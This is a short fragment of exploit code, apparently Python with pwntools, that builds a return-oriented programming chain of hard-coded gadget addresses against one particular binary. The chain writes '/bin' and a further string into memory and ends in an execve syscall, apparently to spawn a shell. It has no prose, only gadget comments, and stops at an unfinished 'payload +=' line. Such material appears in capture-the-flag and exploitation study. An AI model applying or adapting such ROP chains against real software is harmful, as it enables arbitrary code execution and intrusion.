payload = p64(0x42641f)
#0x42641f: pop rax ; retf 0
payload += p64(0x80)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4371b4)+p64(0x4244d4)
# 0x00000000004244d4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x42641f)
# 0x42641f: pop rax ; retf 0
payload += p64(0x6e69622f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x437070)+p64(0x4244d4)
# 0x00000000004244d4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x42641f)
# 0x42641f: pop rax ; retf 0
payload += p64(0x68662f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x437074)+p64(0x4244d4)
# 0x00000000004244d4: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x42641f)
# 0x42641f: pop rax ; retf 0
payload += p64(0x36b36fc9)+p32(0x401553)+p32(0x33)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x437070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x42641f)
# 0x42641f: pop rax ; retf 0
payload += p64(0x3b)+p32(0x40d6bb)+p32(0x33)
# 0x000000000040d6bb: syscall; ret; 
payload +=
